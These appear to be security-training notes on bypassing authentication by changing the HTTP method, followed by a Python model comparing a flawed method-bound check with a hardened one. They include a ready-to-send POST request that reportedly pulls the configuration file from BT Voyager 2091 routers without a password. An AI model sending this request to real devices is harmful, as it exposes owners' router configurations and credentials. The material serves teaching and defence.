Auth bypass: unchecked HTTP methods
- An alternative HTTP method bypasses authentication
- Real example: BT Voyager 2091 [link]
- By design, the config file is requested with a GET
- Changing the method to POST returns the config file without a password:
    POST /psiBackupInfo HTTP/1.1
    Host: 192.168.1.1
    Connection: close
    Content-Length: 0
    <CRLF>
    <CRLF>
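
Added example (not from the original slides or the device firmware): a Python model of the access-control decision, showing a check bound to one HTTP method beside one that authenticates per resource and allow-lists methods. The policy tables, function names and sample requests are assumptions made for illustration.

```python
# Models the access-control decision only; no network I/O.
# PROTECTED_PATHS and ALLOWED_METHODS are assumed policy tables, not the device's.
PROTECTED_PATHS = {"/psiBackupInfo"}
ALLOWED_METHODS = {"/psiBackupInfo": {"GET"}}  # methods the resource is designed for


def decide_weak(method, path, authenticated):
    """Flawed pattern: the authentication rule is bound to one HTTP method."""
    if method == "GET" and path in PROTECTED_PATHS and not authenticated:
        return 401
    return 200  # any other method reaches the handler unauthenticated


def decide_strict(method, path, authenticated):
    """Hardened pattern: authenticate per resource, then allow-list methods."""
    method = method.upper()
    if path not in ALLOWED_METHODS:
        return 404  # unknown resources are never dispatched
    if path in PROTECTED_PATHS and not authenticated:
        return 401  # decided before the method is considered
    if method not in ALLOWED_METHODS[path]:
        return 405  # unexpected methods are rejected, not passed to the handler
    return 200


def compare(requests):
    """Return (method, path, weak_status, strict_status) for each request."""
    return [(m, p, decide_weak(m, p, a), decide_strict(m, p, a))
            for m, p, a in requests]


# Constructed sample requests: (method, path, has_valid_session)
SAMPLE = [
    ("GET", "/psiBackupInfo", False),
    ("POST", "/psiBackupInfo", False),
    ("HEAD", "/psiBackupInfo", False),
    ("GET", "/psiBackupInfo", True),
    ("POST", "/psiBackupInfo", True),
]

if __name__ == "__main__":
    for row in compare(SAMPLE):
        print("%-5s %-16s weak=%d strict=%d" % row)
```

Rows where the weak column is 200 and the strict column is 401 are the requests the method-bound check lets through.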